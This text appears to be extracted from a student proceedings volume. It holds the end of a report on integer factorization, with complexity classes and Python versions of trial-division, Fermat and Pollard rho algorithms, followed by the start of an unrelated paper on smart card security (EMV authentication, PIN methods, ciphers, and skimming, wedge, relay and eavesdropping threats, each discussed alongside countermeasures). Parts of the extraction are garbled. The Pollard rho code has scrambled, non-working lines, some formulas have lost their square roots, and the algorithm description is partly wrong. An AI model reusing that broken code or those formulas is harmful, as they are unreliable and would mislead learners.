The following subsections are a short introduction to the complexity theory. 5.2 Problems A problem can be described formally as a question in some formal language about some input. A kind of problems, which are easier to reason about, are the decision problems. The answer to a decision problem given a certain input is always Y ES or N O. For example, the question ”Is n prime?” with n an input number, is a decision problem called P RIM E. Another kind of problems, the functions problems have not their output limited to Y ES or N O. 5.3 Turing Machines A Turing machine is an abstract model of a computer first introduced by Alan Turing in 1936. Anything that a computer can compute, so can a Turing machine. It consists of an infinite tape as memory and a read-write head moving left or right on the tape. In order to control this, this abstract machine has a finite number of states and a transition function, which, given a state and the symbol under the head, will return three instructions: a new state, a symbol to replace the read symbol with on the tape and where to move the head, left or right. The machine contains three special states. The first one is an initial state, which is, unsurprisingly, the state on which the machine starts. The two others are an accepting state and a rejecting state. In both cases, when the machine reaches one of these states, it stops. The input given to the machine is placed on the tape before any computation is made. Textual Description of Turing Machines. Giving such precise description of a Turing machine is unwieldy, due to all the details. For the rest of the report, we will give only a higher-level text description of what the Turing machine does, when we need to describe one. Given a description, it is possible to convert it to the formal description we’ve just described. 100 Language of a Turing Machine. The language of a Turing machine is defined as the set of all inputs on which the machine will accept, that is to say all the strings of symbols which would lead the Turing machine to the accepting state. Non-deterministic Turing Machines. A non-deterministic Turing machine is much like a normal Turing machine, except for the transition function. Instead of just giving on set of the three instructions (new state, new symbol and direction), it can give many of them. The machine can be seen as making the non-deterministic choice of which one to execute in order to, if possible, go to the accepting state. 5.4 Complexity Classes The complexity classes are a way to classify problems in terms of difficulty of computation. In order to classify a problem, one need to find a corresponding Turing machine whose language is the set of solutions to the problem, encoded in some alphabet. If we take a look at the P RIM E problem, we can find a Turing Machine, that we will call P rime, that will accept for instance all the binary representations of prime numbers. The P Class. Two very important classes in practice are the famous P and N P classes. A problem is in P if it is possible to find a Turing machine that will accept all the solutions to the problem and reject all the others, in polynomial time. By polynomial time, it is meant that the time of computation is bounded by a polynomial depending on the size of the input. Intuitively, the problems feasibly computable on a computer are part of P , like for instance sorting a list of integer or getting the greatest common divisor of two numbers. This is known as the Cobham thesis. 
The problem of deciding whether a number is prime was proven to be in P in 2004. [10]

The NP Class. The NP class is defined like P, except that the deterministic Turing machines are replaced by non-deterministic ones. All problems in P are therefore naturally in NP. It is not known whether there exist problems that are in NP but not in P; this is the famous P = NP question. One can prove that a problem is in NP by verifying a given certificate along with the input; we will use that method later to prove that the factorization problem is in NP.

NP-Complete Problems. A certain subset of NP is known as the NP-complete problems. Any given NP problem can be reduced, at polynomial cost, to an NP-complete problem. This means that if one could find a Turing machine, or an algorithm, that solves any NP-complete problem in polynomial time, there would be a feasible way to compute every problem in NP.

5.5 The Integer Factorization Problem

Integer factorization can be stated as a function problem: given any integer, a unique output, the list of its prime factors, is expected. But the problem is equivalent to the following decision problem: given two integers n and k, is there an integer m such that 1 < m < k and m divides n?

5.6 Integer Factorization is in NP

The integer factorization problem falls in NP, the class of problems solved in polynomial time by a non-deterministic Turing machine. As stated earlier, a problem is in NP if and only if a certificate, or solution, can be verified in polynomial time on a deterministic Turing machine; this is the fact used in the following proof. It is also important to keep in mind that complexity is calculated from the input length: if a number n is passed to the machine, it first needs to be encoded in some alphabet, and the size of the input is of the order of log(n).

Proof. For the proof, we simply define a Turing machine that verifies a solution to the factorization of n, where p1 to pk are the supposed prime factors of n:

    FactorVerifier(<n, p1, p2 .. pk>)
    Begin
        acc := 1
        For f := p1, p2 .. pk:
            If Prime(f) rejects, REJECT
            acc := acc * f
        If acc = n:
            ACCEPT
        Else:
            REJECT
    End

This deterministic Turing machine verifies in polynomial time that n is indeed the product of the primes p1 to pk. It uses another Turing machine, Prime, to test in polynomial time whether a number is prime; as stated earlier, PRIME is in P.
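As a sanity check, the verifier is easy to transcribe into Python, matching the code style used in Section 6. The trial-division primality test below is our own stand-in for the polynomial-time Prime machine (in practice one would use a test such as AKS [10]):

    def is_prime(f):
        # Simple stand-in primality test: trial division up to sqrt(f)
        if f < 2:
            return False
        i = 2
        while i * i <= f:
            if f % i == 0:
                return False
            i += 1
        return True

    def factor_verifier(n, factors):
        # Accept iff every certificate entry is prime and their product is n
        acc = 1
        for f in factors:
            if not is_prime(f):
                return False
            acc *= f
        return acc == n

    print(factor_verifier(3233, [61, 53]))   # True
    print(factor_verifier(3233, [61, 52]))   # False: 52 is not prime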
5.7 Relation to Other Complexity Classes

It is widely believed that this problem is not NP-complete; however, no proof of this has been found so far. The question is closely related to P = NP, which has never been proven or disproven. As an NP problem, we do not know whether a polynomial-time algorithm for integer factorization is possible. But finding a polynomial-time algorithm that solves any NP-complete problem would mean that integer factorization is also feasible in polynomial time, and would greatly compromise the security of public key cryptography systems!

6 Algorithms for Integer Factorization

6.1 Big O Notation

When discussing the complexity of algorithms, we use the Landau notation, known as Big O notation:

    f(n) ∈ O(g(n)) ⟺ ∃k > 0, ∃m ∈ ℕ, ∀n > m: f(n) ≤ g(n) · k    (16)

What this means is that if f(n) ∈ O(g(n)), then f(n) does not grow faster than g(n); in other words, f(n) is bounded by g(n).

6.2 Trivial Factorization Algorithm

Core Ideas. This algorithm is the most naive method to factorize an integer n into a product of primes. Starting at i = 2, we test whether i|n; if it does, we divide n by i and repeat this step, and if not, we increment i until it reaches ⌊√n⌋. The algorithm is deterministic and also decides whether n is prime: if the only returned factor is n, then n is prime; otherwise n is composite and the list of its factors is returned.

Implementation in Python.

    from math import floor, sqrt

    def trivialFactorization(n):
        factors = []
        ncurr = n
        # Trial division by every i up to floor(sqrt(n)) (see Proposition 2)
        for i in range(2, floor(sqrt(n)) + 1):
            while ncurr % i == 0:
                factors.append(i)
                ncurr //= i        # integer division keeps ncurr an int
        if ncurr > 1:              # whatever remains is itself a prime factor
            factors.append(int(ncurr))
        return factors

Running Time. In the worst case, the only factor of n is n itself. The algorithm then performs O(√n) modulo operations (divisions), since every integer up to √n is tested. Each division can be performed in O(log(n)) [11], which leads to an overall worst-case complexity of O(√n · log(n)). In terms of the number of bits m of n, the running time is O(m · e^{m/2}). While this running time is acceptable for small numbers or integers with small factors, the algorithm becomes totally impractical when trying to factor a large number with large prime factors.

Improvements. There is no need to check every integer up to √n. A first improvement is to leave out all even numbers after having repeatedly divided n by 2. We can further improve the algorithm by using the sieve of Eratosthenes, since only prime factors need to be considered.
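A sketch of this improvement (our own, under the same conventions as the code above): precompute the primes up to √n with the sieve of Eratosthenes, and trial-divide by those primes only.

    from math import isqrt

    def primes_up_to(limit):
        # Sieve of Eratosthenes: cross out the multiples of each prime
        sieve = [True] * (limit + 1)
        sieve[0:2] = [False, False]
        for i in range(2, isqrt(limit) + 1):
            if sieve[i]:
                for j in range(i * i, limit + 1, i):
                    sieve[j] = False
        return [i for i, p in enumerate(sieve) if p]

    def sieveFactorization(n):
        factors = []
        for p in primes_up_to(isqrt(n)):   # only prime candidates are tried
            while n % p == 0:
                factors.append(p)
                n //= p
        if n > 1:
            factors.append(n)
        return factors

    print(sieveFactorization(8051))   # [83, 97]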
The main idea in Pollard’s % algorithm is to generate two random numbers (0 ≤ x, y < n) by using a cyclic function, and hope their difference divides √n. The key observation is that, according to the birthday paradox, only 1.18 · n numbers have to be tested before finding a potential factor of n with a probability of 0.5. This algorithm may fail to find factors for a composite n. This happens since the random function image may not cover the whole interval [0, n[. In that case, the algorithm is repeated with another function than the usual f (x) = x2 + 1. (17) It has also to be noted that the algorithm fails on prime numbers, since (|x−y|, n) is always equal to 1 in that case. Implementation in Python. def pollardFactorization(n): f = lambda x: x**2 + 1 def gcd(a, b): 105 if b == 0: return a else: return gcd(b, a%b) def pollardFactor(n): x = 2 y = 2 z = 1 while x y z z = = = == 1: f(x) f(f(y)) gcd(abs(x-y), n) return int(z) m = pollardFactor(n) n = int(n/m) return [m, n] Running √ Time. Pollard’s %-algorithm has a complexity and standard derivation of O( n) or O(2m/2 ) where m is the number of bits in n, when a random mapping function is used. [13] Improvements. Several improvements to this factorization algorithm have been proposed over the years. They include different methods for cycle detection and not computing z at every iteration. [14] 6.5 Other Algorithms All the presented algorithms are so-called special-purpose factoring algorithms. This means that their running time does not depend solely on the size of the integer to be factored. Their actual running-time may depend on the size of the number’s factors (Trivial, Fermat, Pollard’s %), algebraic properties (Pollard’s % − 1), or other properties. Elliptic curve factorization is another well-known sub-exponential special-purpose factoring algorithm. [15] Inversely, general-purpose factorization algorithms depend uniquely on the size of the integer to be factored. These algorithms are the ones used in practice when trying to factor integers from RSA-crypto-systems. The general number field sieve is currently the fastest algorithm from this category when factoring large integers (typically above 100 digits). 106 7 7.1 Conclusion Current State of the Art In 2009, a team of researchers managed to a factor a 768 bits number (232 digits), using a cluster of PlayStation 3 over 2 years.[16] The number was known as RSA-768 and was proposed by the RSA Laboratories as part of a challenge. However, the challenge was canceled in 2007. It is still today the largest RSAnumber factored. Though this number was factorized, the security of the RSA systems are not compromised, as it would take the same amount of time to factor for any other number of that size that would be used for RSA. Moreover, the recommended size of numbers used for RSA is increasing with time. 7.2 Peek at the Future With the emerging quantum computers, the integer factorization could become a much simpler problem. In fact, there already exists an algorithm running in polynomial time on a quantum computer that computes the prime factors of any given number. This algorithm is known as the Shor’s algorithm.[17] In 2001, the number 15 was factored on a quantum computer using the Shor’s algorithm by researchers from IBM-Almaden and Stanford University.[18] Factoring this small might seem a derisory achievement, but in fact it is a major milestone in the field. It proves the feasibility of quantum computer and Shor’s algorithm in practice. 
If researchers find a way to make quantum computers scale, the end of most cryptosystems such as RSA will be inevitable.

7.3 Final Words

As we have seen throughout this report, integer factorization is a very interesting problem of great importance in various fields, such as cryptography and complexity theory. It is also the perfect problem for quantum computers to work on. Most of all, the problem has practical, real-life implications: any efficient way to compute the prime factors of a huge number would have gigantic effects, as a huge number of systems rely on the difficulty of factoring big numbers for their security!

References

1. Oystein Ore. Number Theory and Its History. Courier Dover Publications, 1988.
2. G. Bisson. Factorisation d'entiers, 2011.
3. Kenneth H. Rosen. Discrete Mathematics and Its Applications. McGraw-Hill, Boston, 5th edition, 2003.
4. Joseph J. Rotman. First Course in Abstract Algebra. Prentice Hall, 2005.
5. N. Bourbaki. Éléments d'histoire des mathématiques. Masson, 1984.
6. S. Büttcher. Cryptography and security of open systems, factorization of large integers. Ferienakademie, 2001.
7. W. Stein. Elementary Number Theory: Primes, Congruences, and Secrets. 2011.
8. Michael Sipser. Introduction to the Theory of Computation. Course Technology, 2005.
9. Alan Cobham. The intrinsic computational difficulty of functions. In Y. Bar-Hillel, editor, Logic, Methodology and Philosophy of Science, proceedings of the second International Congress, held in Jerusalem, 1964. North-Holland, Amsterdam, 1965.
10. Manindra Agrawal, Neeraj Kayal, and Nitin Saxena. PRIMES is in P. Annals of Mathematics, 160(2):781–793, 2004.
11. John D. Lipson. Newton's method: a great algebraic algorithm. In Proceedings of the third ACM symposium on Symbolic and algebraic computation, SYMSAC '76, pages 260–270, New York, NY, USA, 1976. ACM.
12. R. Lehman. Factoring large integers. Mathematics of Computation, 1974.
13. B. Luders. An analysis of the complexity of the Pollard rho factorization method. 2005.
14. R. P. Brent. An improved Monte Carlo factorization algorithm. 1980.
15. H. W. Lenstra Jr. Factoring integers with elliptic curves. The Annals of Mathematics, 1987.
16. Thorsten Kleinjung, Kazumaro Aoki, Jens Franke, Arjen Lenstra, Emmanuel Thomé, Joppe Bos, Pierrick Gaudry, Alexander Kruppa, Peter Montgomery, Dag Arne Osvik, Herman te Riele, Andrey Timofeev, and Paul Zimmermann. Factorization of a 768-bit RSA modulus. Cryptology ePrint Archive, Report 2010/006, 2010.
17. Peter W. Shor. Algorithms for quantum computation: Discrete logarithms and factoring. In FOCS, pages 124–134. IEEE Computer Society, 1994.
18. Lieven M. K. Vandersypen, M. Steffen, G. Breyta, C. S. Yannoni, M. H. Sherwood, and I. L. Chuang. Experimental realization of Shor's quantum factoring algorithm using nuclear magnetic resonance. Nature, 414:883–887, 2001 (arXiv:quant-ph/0112176).

Smart Card Security: A Study into the Underlying Techniques Deployed in Smart Cards

Clement Tan, Qi Lin Ho, Soo Ming Poh

Abstract. This paper explores the techniques used with smart cards, broadly categorized into contact smart cards and contactless smart cards. For each technique, the underlying methods are outlined and their strengths and weaknesses evaluated. Potential threats to smart cards are also discussed, together with the solutions provided to counter the security issues threatening smart cards.
1 Introduction

The smart card has been one of the most remarkable inventions in the Information Technology (IT) sphere. The smart card was first invented in 1968 and first saw commercial use in France in 1983, as a telephone card paying for the use of public pay phones [1]. After the successful mass use of these cards, the memory concept was incorporated into them, and further research then led to the development of microprocessor smart cards.

Smart cards can be categorized along two general dimensions: (1) memory versus microprocessor; (2) contact versus contactless. In the former category, memory smart cards only store data, while microprocessor smart cards not only store data but also allow the addition, deletion and modification of data stored within the memory. In the latter category, contact smart cards require physical interaction with card readers/terminals in order to work, whereas contactless smart cards eliminate the need for physical contact with the terminal thanks to an antenna embedded within the card, which allows communication to take place.

Due to the many benefits smart cards have brought to people, including convenience and ease of use, their popularity has been increasing tremendously. At present, smart cards are used in application areas such as: (1) finance, e.g. credit cards, debit cards; (2) mass transit, e.g. EZ-Link cards; (3) identification, e.g. biometric cards; (4) healthcare, e.g. health insurance cards; (5) telecommunications, e.g. SIM (Subscriber Identification Module) cards.

This paper focuses mainly on contact and contactless smart cards. The rest of the paper is organized as follows: Sections 2 and 3 introduce contact and contactless smart cards respectively, together with their underlying security techniques; Section 4 compares the security techniques and their associated threats; Section 5 discusses the future of smart cards; and the paper concludes in Section 6.

2 Contact Smart Cards

Contact smart cards are cards embedded with an integrated circuit chip (ICC) that contains either memory alone or memory combined with a microprocessor. As the name suggests, a contact smart card has to be inserted into a smart card reader in order to establish a direct connection for the transfer of data [2]. Contact smart cards can be identified by a small but obvious gold connector plate, measuring approximately one square centimetre, located at a corner of the card. Examples of contact smart cards include cash cards, credit cards, debit cards and the SIM (Subscriber Identification Module) cards used in mobile phones.

2.1 Security Techniques Implemented in Contact Smart Cards

EMV (Europay, MasterCard and VISA) technology sets the specifications established in support of replacing the magnetic strip with chip technology on contact smart cards. With the introduction of the EMV specifications, global interoperability can be assured between contact smart cards and card readers [3]. More importantly, EMV also enhances the security level in the three main areas of concern in a contact smart card transaction: card authentication, cardholder verification and transaction authorization [4].

Card Authentication. To prove the genuineness of contact smart cards and enhance protection against counterfeits, three techniques are made available.
These include Static Data Authentication (SDA), Dynamic Data Authentication (DDA) and Combined DDA with Application Cryptogram Generation (CDA). During a payment transaction, the card chip and the terminal agree to perform either SDA, DDA or CDA; only one method of offline data authentication is performed for a particular transaction.

Static Data Authentication. SDA makes use of a symmetric-key encryption technique whereby the card and the bank share the same secret key. This key is required to verify the Cryptographic Check Value (CCV) stored in the card during personalization [5]. It must be noted that the card is only considered verified once the bank confirms it. The issue with SDA is that the card can only be proven genuine if the terminal is online. In the case of an offline terminal, the card cannot be validated straight away: all the offline terminal does is record the response provided by the card during authorization and send it to the bank once there is a connection. This shortcoming puts SDA chip cards at a disadvantage, since they are perceived to be even less secure than magnetic strip cards when an offline terminal is used (i.e. one that will never have any connection).

Dynamic Data Authentication. DDA is a more secure technique than SDA. Instead of utilizing a single shared secret key, DDA stores an encryption key on the card and allows offline data authentication: the card uses public key technology to generate a cryptographic value, which includes transaction-specific data elements, that is validated by the terminal to protect against skimming [6], a feature SDA is unable to provide. In addition, the card generates a new cryptographic value each time a new transaction is performed. DDA is therefore perceived to be a stronger form of card authentication, since attackers cannot acquire the private key on the chip card just by reading the card [7].

Combined DDA with Application Cryptogram Generation. CDA combines the underlying techniques of both SDA and DDA. With CDA, not only can the genuineness of the card be validated; it can additionally be determined whether the data within the card has been altered since personalization. In this way, the malicious act of programming offline terminals through the use of counterfeit cards can be avoided [8]. Essentially, all three techniques for card authentication employ RSA (Rivest, Shamir and Adleman) public key cryptography.
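As a rough sketch of the dynamic part of DDA/CDA, the card can sign a fresh terminal challenge together with transaction data, and the terminal can verify the signature with the card's public key. The toy example below is our own simplification (textbook-sized RSA numbers and an invented data format, nothing like the real EMV message layout), meant only to illustrate the principle:

    import hashlib, os

    # Toy RSA key pair; real cards carry certified keys of realistic length.
    p, q = 61, 53
    n_mod = p * q          # 3233
    e = 17                 # public exponent
    d = 2753               # private exponent: e*d = 1 mod lcm(p-1, q-1)

    def card_sign(challenge, txn_data):
        # The card hashes the terminal's fresh challenge together with
        # transaction-specific data and signs the digest with its private key.
        digest = hashlib.sha256(challenge + txn_data).digest()
        m = int.from_bytes(digest, "big") % n_mod
        return m, pow(m, d, n_mod)

    def terminal_verify(m, signature):
        # The terminal checks the signature using the card's public key.
        return pow(signature, e, n_mod) == m

    challenge = os.urandom(8)               # fresh per transaction: stops replays
    m, sig = card_sign(challenge, b"amount=50.00,currency=SGD")
    print(terminal_verify(m, sig))          # True

Because the challenge changes on every transaction, a skimmer that records one exchange learns nothing it can replay, which is exactly the property the text attributes to DDA.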
Card Verification. To prove the genuineness of the owner and protect against lost and/or stolen cards, four cardholder verification methods (CVM) are used: online PIN, offline PIN, signature, and no CVM required.

Online PIN. With this verification technique, users enter their PIN, which is encrypted with the Triple DES Data Encryption Standard (3DES) and then transported to the issuer (the bank) for verification [9].

Offline PIN. In the case of offline PIN, the PIN entered by the user is compared with the PIN value pre-assigned in the card. In addition, there exists an offline counter which blocks the offline PIN once a certain number of incorrect PIN attempts have been made [10].

Signature. The cardholder is required to physically provide a signature in order to prove being the genuine owner. An advantage of using a signature as a form of verification is that forging a signature involves a certain level of difficulty; however, this does not mean there are no cases of signature forging. On the other hand, this verification method requires a human to be present to compare the signature provided with the one on the card and determine its genuineness [11].

No CVM Required. This can be said to be the most dangerous verification method since, if no CVM is required, there is effectively no verification process at all. The only advantage of this method is the fluency of transactions [12].

Transaction Authorization. To prove that a transaction is genuinely initiated by the user, the transaction needs to be authorized by that user. This process, Online Mutual Authentication (OMA), involves an Authorization Request Cryptogram (ARQC) and an Authorization Response Cryptogram (ARPC). The contact smart card produces an ARQC and passes it to the terminal (i.e. the card reader) and then on to the issuer (bank) when a transaction is initiated. Only when verification is successful will the issuer return an ARPC to the card. The card then returns a Transaction Certificate to proceed with the transaction.

3 Contactless Smart Cards

Contactless smart cards employ a radio frequency link between the Proximity IC Card (PICC) and the Proximity Coupling Device (PCD), without physical insertion of the card into the reader. As seen in Fig. 1, this is made possible because the PICC contains an integrated chip and an inductive antenna coil embedded within the card. An alternating current passes through the PCD antenna and creates an electromagnetic field, which induces a current in the PICC antenna. The PICC then converts this induced current into a DC voltage to power the PICC's internal circuits. The maximum proximal distance possible for transmission is determined by the configuration and tuning of both antennas in the PICC and the PCD.

Fig. 1. PCD and PICC Configuration

Contactless smart cards are used in situations where quick transactions are necessary, for instance whenever the cardholder is in motion at the moment of the transaction. Many contactless readers are designed specifically for cashless payment, physical access control, identification systems and transportation applications [13].

3.1 Security Techniques Implemented

Triple Data Encryption Standard. Triple DES takes three 64-bit keys, for an overall key length of 192 bits. A Triple DES implementation breaks the user-provided key into three subkeys, padding the keys if necessary so that they are each 64 bits long. The data is encrypted with the first key, decrypted with the second key, and finally encrypted again with the third key. Triple DES runs three times slower than standard DES, but is much more secure if used properly. The procedure for decryption is the same as the procedure for encryption, except that it is executed in reverse. Like DES, Triple DES encrypts and decrypts data in 64-bit blocks [14].
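The encrypt-decrypt-encrypt (EDE) construction just described can be sketched in a few lines. The example below composes it from single-DES primitives using the PyCryptodome package (an assumption on our part; any DES implementation would do):

    from Crypto.Cipher import DES  # PyCryptodome

    def triple_des_encrypt_block(block, k1, k2, k3):
        # EDE: encrypt with k1, decrypt with k2, encrypt with k3.
        step1 = DES.new(k1, DES.MODE_ECB).encrypt(block)
        step2 = DES.new(k2, DES.MODE_ECB).decrypt(step1)
        return DES.new(k3, DES.MODE_ECB).encrypt(step2)

    def triple_des_decrypt_block(block, k1, k2, k3):
        # Decryption is the same procedure executed in reverse (DED).
        step1 = DES.new(k3, DES.MODE_ECB).decrypt(block)
        step2 = DES.new(k2, DES.MODE_ECB).encrypt(step1)
        return DES.new(k1, DES.MODE_ECB).decrypt(step2)

    k1, k2, k3 = b"8bytekey", b"8byteke2", b"8byteke3"      # toy keys
    ct = triple_des_encrypt_block(b"ABCDEFGH", k1, k2, k3)  # one 64-bit block
    assert triple_des_decrypt_block(ct, k1, k2, k3) == b"ABCDEFGH"

Note that choosing k1 = k2 = k3 makes the construction collapse to single DES, which is why distinct subkeys are essential.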
Advanced Encryption Standard. AES is a symmetric block cipher that encrypts and decrypts 128-bit blocks of data. The algorithm consists of 4 stages that make up a round, which is iterated 10 times for a 128-bit key. The first stage, the "SubBytes" transformation, is a non-linear byte substitution applied to each byte of the block. The second stage, the "ShiftRows" transformation, cyclically shifts (permutes) the bytes within the rows of the block. The third stage, the "MixColumns" transformation, groups 4 bytes together to form 4-term polynomials and multiplies them by a fixed polynomial mod (x^4 + 1). The fourth stage, the "AddRoundKey" transformation, adds the round key to the block of data [15].

RSA Signature. RSA is a public key cryptosystem used for both encryption and authentication. It is an encryption algorithm that uses very large prime numbers to generate the public key and the private key. RSA is typically used in conjunction with a secret-key cryptosystem such as DES: DES is used to encrypt the message as a whole, and RSA is then used to encrypt the secret key [16].

Elliptic Curve Cryptography (ECC). ECC is a form of public key cryptography. The "domain parameters" in ECC are predefined constants that must be known by all the devices taking part in the communication between the sender and the receiver. ECC does not require any shared secret between the communicating parties, but it is much slower than private-key cryptography. The mathematical operations of ECC are defined over the elliptic curve y^2 = x^3 + ax + b, where 4a^3 + 27b^2 ≠ 0. Each choice of the values 'a' and 'b' gives a different elliptic curve. The public key is a point on the curve and the private key is a random number; the public key is obtained by multiplying the private key with a generator point G on the curve. The generator point G and the curve parameters 'a' and 'b', together with a few more constants, constitute the domain parameters of ECC [17].
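The relation "public key = private key × G" can be made concrete with a toy curve over a small prime field. The sketch below implements point addition and double-and-add scalar multiplication for y^2 = x^3 + ax + b over GF(p); the tiny curve parameters are our own choice for illustration and are far too small for real use:

    def ec_add(P, Q, a, p):
        # Add two points on y^2 = x^3 + ax + b over GF(p); None is the point at infinity.
        if P is None: return Q
        if Q is None: return P
        (x1, y1), (x2, y2) = P, Q
        if x1 == x2 and (y1 + y2) % p == 0:
            return None                                      # P + (-P) = infinity
        if P == Q:
            s = (3 * x1 * x1 + a) * pow(2 * y1, -1, p) % p   # tangent slope
        else:
            s = (y2 - y1) * pow(x2 - x1, -1, p) % p          # chord slope
        x3 = (s * s - x1 - x2) % p
        return (x3, (s * (x1 - x3) - y1) % p)

    def scalar_mult(k, P, a, p):
        # Double-and-add: computes k * P in O(log k) point operations.
        R = None
        while k:
            if k & 1:
                R = ec_add(R, P, a, p)
            P = ec_add(P, P, a, p)
            k >>= 1
        return R

    # Toy curve y^2 = x^3 + 2x + 2 over GF(17), generator G = (5, 1)
    a, p, G = 2, 17, (5, 1)
    priv = 7                           # private key: a random number
    pub = scalar_mult(priv, G, a, p)   # public key: a point on the curve
    print(pub)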
4 Comparison across Smart Card Security Techniques

4.1 Evaluation of Security Techniques in Contact Smart Cards

This section analyses the security techniques employed in contact smart cards, covering the strengths (i.e. benefits) and weaknesses (i.e. potential threats) of each underlying technique. In addition, suggested solutions or mitigations are provided.

Card Authentication.

Static Data Authentication. The main reason why SDA is used in the card authentication process is its low implementation cost. It is generally much cheaper to deploy SDA than DDA, because SDA does not require public key cryptographic processing; without this process, there is no need for cards that come with a public key cryptographic processor, hence the lower cost [18].

As the saying goes, "you get what you pay for": a cheaper technique is bound to have weaknesses. As mentioned earlier, SDA requires a terminal that is online in order to validate the genuineness of the card. An attacker can launch an attack simply by making use of an offline terminal. For example, an attacker skims/clones a genuine card to produce a counterfeit card for use on an offline terminal. All he needs to do is program the card in such a way that it will accept whatever PIN he enters [19], and the transaction, or rather the attack, will be successful.

Skimming and Cloning. Information on a card can be recorded when a user uses his card on a machine with skimming devices attached, and the PIN entered by the user can be captured with a capturing device. Once this has been done, the unauthorized user can duplicate the card by cloning all of its information. Since the unauthorized user now has a cloned card and the PIN, he is able to pass as authorized for any transaction. In order to lower the risk of skimming and cloning leading to the production and use of counterfeit cards, additional properties such as data locking and tamper resistance can be included. With the former, data within the card is locked so that an attacker cannot retrieve it. With the latter, data within the card is encrypted so that even if an attacker finds a way to retrieve the data, he will not be able to decipher it. In this way, the card is much more secure.

Dynamic Data Authentication. Dynamic Data Authentication is used as one of the means to mitigate the threat faced by SDA. As mentioned in the previous section, the combination of an encryption key with public key technology makes DDA a more secure authentication method, since the card data can be authenticated and validated. DDA also includes additional security features, such as secure key storage and tamper resistance, which prevent the counterfeiting of cards [20]. However, these additional security features require cards integrated with a public key cryptographic processor, which explains the higher cost of dynamic data authentication compared to the static data authentication technique.

In addition, DDA is not foolproof: a "wedge" attack remains possible. Since card authentication takes place before PIN verification, a stolen card can be exploited without knowing the correct PIN [21]. As shown in Fig. 2 below, an electronic device acting as a "man in the middle" or "wedge" can manipulate the messages flowing between the terminal and the card, interfering with the cardholder verification process.

Fig. 2. Variation of a Man-in-the-Middle Attack/"Wedge" Attack on a Contact Smart Card [22]

A suggested solution is to allow the card authentication and cardholder verification processes to take place simultaneously. By doing so, the risk of a "wedge" attack can be moderated. As will be seen shortly, another authentication method, the Combined DDA with Application Cryptogram Generation technique, is able to perform this function.

Combined DDA with Application Cryptogram Generation. Faced with the threat of the "wedge" attack on the DDA technique, a later variant of card authentication, CDA, was introduced. CDA is able to partially solve the issue faced by DDA, since CDA performs card authentication and PIN verification at the same time. However, due to its lack of interoperability (i.e. it may not work with terminals of older versions), CDA has not received as much popularity as DDA [23]. CDA is actually considered a very secure authentication method; its interoperability issues should therefore be dealt with in order for it to gain wider acceptance.

Card Verification.

Online PIN Verification. The online PIN method has a high level of security, given that the PIN is encrypted with Triple DES when transported to the issuer for verification. With the issuer's verification, card verification can be achieved with minimal threat.

Offline PIN Verification. This method of card verification also provides a high level of security, given that it maintains an offline counter which blocks the use of the offline PIN after a certain number of incorrect PIN attempts. As illustrated in Fig. 3, the chip decreases the PIN Try Counter by one each time an incorrect PIN is entered. When the counter reaches zero, the card is blocked and the user needs to go to the issuer to re-activate it. This protection can also be a double-edged sword: if a genuine cardholder forgets his PIN, the blocking of the card becomes an annoyance, since he will need to re-activate his card in order to use it.

Fig. 3. Offline PIN Verification Process [24]
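The PIN Try Counter logic of Fig. 3 is simple enough to capture in a few lines. The sketch below is a behavioural model only; the field names and the limit of three attempts are our assumptions (issuers configure the actual limit):

    class OfflinePinVerifier:
        def __init__(self, reference_pin, try_limit=3):
            self.reference_pin = reference_pin
            self.try_limit = try_limit
            self.pin_try_counter = try_limit

        def verify(self, entered_pin):
            if self.pin_try_counter == 0:
                return "card blocked: re-activate at the issuer"
            if entered_pin == self.reference_pin:
                self.pin_try_counter = self.try_limit   # reset on success
                return "PIN verified"
            self.pin_try_counter -= 1                   # chip decrements the counter
            if self.pin_try_counter == 0:
                return "card blocked: re-activate at the issuer"
            return "wrong PIN, tries left: %d" % self.pin_try_counter

    card = OfflinePinVerifier("1234")
    print(card.verify("0000"))   # wrong PIN, tries left: 2
    print(card.verify("1234"))   # PIN verified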
Signature. This method of card verification provides ease of use. Apart from eliminating the need to remember PINs (assuming each card is given a different PIN), a signature is very personal: only the genuine owner knows the exact way of signing it. However, forging a signature is not impossible. Since the signature can be found on the back of the card, anyone who picks up a signed card can learn to forge the signature. On top of that, merchants often do not check the signature provided against the one on the card. This places the signature verification method at higher risk in terms of security.

PIN and signature verification methods do indeed have their own advantages; however, they possess certain inevitable threats. The former is prone to "PIN stealing": a PIN entered at a terminal can be observed by "shoulder surfing". The latter, as mentioned, is prone to forgery. As a result, both PIN and signature verification methods can be seen as insecure. According to one report, 63% of consumers would prefer a fingerprint as a form of card verification over PIN and signature [25]. In the future, fingerprint verification may well take over from the other verification methods. This is highly feasible, since a fingerprint is a form of biometric capable of identifying an individual, and no two persons have identical fingerprints. It can therefore reach an even higher level of security, eliminating the threats of "PIN stealing" and forgery.

EMV Technology as a Whole. The above provides a specific analysis of the individual security techniques. As we can see, EMV technology is considered highly secure; however, EMV is still not foolproof. A prominent example of a potential threat faced by contact smart cards is the middleperson attack (relay attack).

Middleperson Attack (Relay Attack) [26]. Suppose you are at a restaurant having lunch. At the end of the meal, you pay $50 with your VISA card. However, at the end of the month, you find out you have paid $500 instead of $50 for the meal. What actually happened?

Fig. 4. Man-in-the-Middle Attack on a Contact Smart Card [27]

The above example is one form of middleperson attack, or relay attack. The point-of-sale (POS) terminal used to make the payment had been tampered with. Just as you were about to enter your PIN at the POS terminal, the waiter at the restaurant informed his accomplice to get ready for the "attack". The accomplice first inserts a fake card into a POS terminal at another store. As soon as you enter your PIN, the PIN is transmitted wirelessly to the fake card; the accomplice enters the PIN he has received, and a successful attack has just been launched. The attackers have used your account to pay for their items at another store.

4.2 Evaluation of Security Techniques in Contactless Smart Cards

This section analyses the security of contactless smart cards, covering the strengths (i.e. benefits) and weaknesses (i.e. potential threats) specific to contactless smart card technology. In addition, suggested solutions or mitigations are provided.

Potential Threats to Contactless Smart Cards [28]. The main difference between contact and contactless smart cards lies in the process by which information is transmitted between the card and the reader.
In the case of the contactless smart card, the card does not need to be inserted into, or be in direct contact with, the reader. The contactless transmission of data creates opportunities for attack, and thereby threats specific to contactless smart cards.

Eavesdropping. The absence of a physical medium between the contactless smart card and the reader makes it convenient and easy to intercept and change the data being transmitted over the air. Eavesdropping is a common threat which exploits this, the largest weakness of contactless information transmission: attackers are able to eavesdrop on, and alter, the data being transferred. In the passive setting, an attacker may learn useful or confidential information by triggering a response from the card at a distance, with the user unaware of it. In the active setting, man-in-the-middle attacks are facilitated: an attacker can replace a few blocks of the data originally transferred with blocks of data of his choosing. For these reasons, it is important to stress that encryption of the exchanged data and mutual authentication are compulsory in most cases.

